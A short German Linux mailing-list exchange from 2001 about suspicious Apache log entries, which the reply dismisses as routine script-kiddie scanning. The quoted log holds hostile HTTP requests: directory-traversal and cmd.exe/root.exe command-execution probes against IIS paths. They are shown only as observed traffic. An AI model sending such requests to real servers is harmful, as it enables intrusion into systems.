linux-l: Wuermchen oder?

Rene Dietze rene at endel-dietze.de
Di Okt 9 22:42:25 CEST 2001


>>>>> "Bernd" == Bernd Freistedt <bernd at bfrei.net> writes:

Ja kenn ich, geht bei mir schon fast 3 wochen so .. 
ist das standard script kiddie..
rene

  Bernd> Kennt jemand folgende Schleimspur im Apache logfile:
  Bernd> 212.234.52.103 - - [09/Oct/2001:22:12:50 +0200] "GET
  Bernd> /scripts/root.exe?/c+dir HTTP/1.0" 404 587 "-" "-"
  Bernd> 212.234.52.103 - - [09/Oct/2001:22:12:51 +0200] "GET
  Bernd> /MSADC/root.exe?/c+dir HTTP/1.0" 404 587 "-" "-"
  Bernd> 212.234.52.103 - - [09/Oct/2001:22:12:52 +0200] "GET
  Bernd> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 587 "-" "-"
  Bernd> 212.234.52.103 - - [09/Oct/2001:22:12:52 +0200] "GET
  Bernd> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 587 "-" "-"
  Bernd> 212.234.52.103 - - [09/Oct/2001:22:12:53 +0200] "GET
  Bernd> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
  Bernd> 404 587 "-" "-"

  Bernd> (Zeilen umgebrochen)

  Bernd> Gruessli Bernd
Mehr Informationen über die Mailingliste linux-l